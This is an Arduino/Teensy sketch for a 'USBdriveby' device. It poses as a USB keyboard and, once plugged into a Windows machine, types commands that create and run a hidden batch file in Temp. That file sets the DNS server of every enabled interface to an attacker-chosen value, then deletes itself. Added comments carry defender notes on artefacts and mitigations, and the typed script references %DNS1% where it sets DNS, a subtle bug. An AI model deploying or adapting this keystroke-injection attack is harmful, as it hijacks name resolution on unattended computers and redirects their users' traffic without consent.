// USBdriveby Windows version by FFY00 (Filipe Laíns)
// Based on Samy Kamkar's work
//
// https://github.com/samyk/usbdriveby
// Simulates a HID keyboard and runs a batch file to change the DNS server
// Tested on Windows 7
// Resolver address that pwn() types into the generated batch file.
// 8.8.8.8 is Google Public DNS, so the committed value looks like a
// stand-in rather than an attacker-run resolver.
// Defender note: an unexpected change of a host's configured DNS server
// redirects its name resolution and is worth alerting on.
#define EVIL_SERVER "8.8.8.8"

// Base pause in milliseconds between UI steps; passed to delay() directly
// and as delayTime/5 and delayTime/10 in pwn().
const unsigned int delayTime = 1500;

// Pin driving the status LED (written in setup() and loop()).
const unsigned int ledPin = 13;
// Runs once at power-up: lights the LED, waits until the host answers
// keyboard LED reports, then types the payload.
// Defender note: nothing here waits for a user action, so the device acts
// as soon as it is plugged in and the host has loaded its HID driver.
void setup()
{
    // Initial one-second settle time before touching anything.
    delay(1000);

    // LED on = device is working; loop() later switches to a fast blink.
    pinMode(ledPin, OUTPUT);
    digitalWrite(ledPin, HIGH);

    // Block until the host reacts to Caps Lock toggles.
    waitForDrivers();

    // Type the keystroke sequence.
    pwn();
}
// Launch a program through the Windows Run dialog.
// `app` is typed verbatim into the dialog and confirmed with Enter.
// Defender note: the program is started by the shell on behalf of the
// logged-in user, so in process-creation logs it looks like an interactive
// launch.
void openapp(String app)
{
    // GUI (Windows) key + R brings up Run; pause so the dialog has focus.
    key(KEY_R, MODIFIERKEY_RIGHT_GUI);
    delay(delayTime);

    // Enter the program name and confirm.
    Keyboard.print(app);
    key(KEY_ENTER, 0);
    Keyboard.send_now();

    // Wait again so the launched program is ready for the next keystrokes.
    delay(delayTime);
}
// Send a single key press (with an optional modifier) followed by its
// release. KEY and MODIFIER are passed straight to the Keyboard object.
void key(int KEY, int MODIFIER)
{
    // Two reports in order: the press, then an all-zero report as release.
    const int reports[2][2] = {
        { MODIFIER, KEY },
        { 0, 0 },
    };

    for (int i = 0; i < 2; i++)
    {
        Keyboard.set_modifier(reports[i][0]);
        Keyboard.set_key1(reports[i][1]);
        Keyboard.send_now();
        delay(20); // short gap after each report
    }
}
// Block until the host reports an LED state back to the device, which is
// taken as the sign that the keyboard driver is active.
// Value 2 in keyboard_leds is tested against Caps Lock toggles, so it is
// presumably the Caps Lock LED bit -- confirm against the core's headers.
// Defender note: the visible side effect is Caps Lock being toggled
// repeatedly right after a new keyboard is attached.
void waitForDrivers()
{
    const int capsLockLed = 2;

    // Keep toggling Caps Lock until the host reports the LED as lit.
    for (;;)
    {
        if (keyboard_leds & capsLockLed)
        {
            break;
        }
        key(KEY_CAPS_LOCK, 0);
    }

    // Toggle once more while the LED is reported lit, so Caps Lock is not
    // left switched on.
    if ((keyboard_leds & capsLockLed) != 0)
    {
        key(KEY_CAPS_LOCK, 0);
    }
}
// Payload routine: types a fixed keystroke sequence into the host session.
// As written it opens a command prompt, creates pwn.bat under
// AppData/Local/Temp (relative to the prompt's starting directory), fills it
// in through Notepad, runs it, deletes it and closes the window.
// The typed script loops over the `netsh int show interface` output and
// issues `netsh int ipv4 set dns ... static` for rows marked Enabled, then
// flushes the resolver cache. The text is typed verbatim; whether the script
// behaves as its author intended has not been verified here.
//
// Defender notes:
// - Observable artefacts: cmd.exe started from the Run dialog, a short-lived
//   pwn.bat in the user's Temp directory, notepad.exe opened on it, netsh.exe
//   with "set dns ... static" arguments, and ipconfig /flushdns. The batch
//   file is deleted afterwards, so process-creation / command-line logging is
//   a more durable source than the file system.
// - The sequence relies on fixed delays (delayTime) rather than host feedback.
// - Mitigations to evaluate: device-control policy for newly attached HID
//   keyboards, locking unattended sessions, and alerting on changes to
//   interface DNS servers. Changing DNS with netsh normally needs
//   administrative rights -- TODO confirm for the OS versions in scope.
void pwn()
{
// Command prompt via the Run dialog
openapp("cmd");
// Create an empty pwn.bat in the Temp directory and open it in Notepad
Keyboard.println("cd AppData/Local/Temp");
Keyboard.println("echo.>pwn.bat");
Keyboard.println("notepad pwn.bat");
delay(delayTime);
// Batch file contents, typed into Notepad line by line
Keyboard.println("@ECHO OFF");
Keyboard.print("set DNS=");
Keyboard.println(EVIL_SERVER);
Keyboard.println("for /f \"tokens=1,2,3*\" %%i in ('netsh int show interface') do (");
Keyboard.println(" if %%i equ Enabled (");
Keyboard.println(" netsh int ipv4 set dns name=\"%%l\" static %DNS1% primary validate=no");
Keyboard.println(" )");
Keyboard.println(")");
Keyboard.println("ipconfig /flushdns"); // Flush DNS is optional
// Alt+F4 closes Notepad; the Enter that follows presumably accepts its
// save prompt -- confirm
key(KEY_F4, MODIFIERKEY_ALT);
delay(delayTime/5);
key(KEY_ENTER, 0);
delay(delayTime);
// Back in the command prompt: run the batch file, then delete it
Keyboard.println("pwn.bat");
delay(delayTime);
Keyboard.println("del pwn.bat");
// Alt+Space opens the window's system menu; C presumably selects Close
// -- confirm
key(KEY_SPACE, MODIFIERKEY_ALT);
delay(delayTime/10);
key(KEY_C, 0);
}
// Runs repeatedly after setup() returns: a fast LED blink signalling that
// the keystroke sequence has been sent.
void loop()
{
    const int blinkHalfPeriodMs = 80;

    digitalWrite(ledPin, HIGH);
    delay(blinkHalfPeriodMs);

    digitalWrite(ledPin, LOW);
    delay(blinkHalfPeriodMs);
}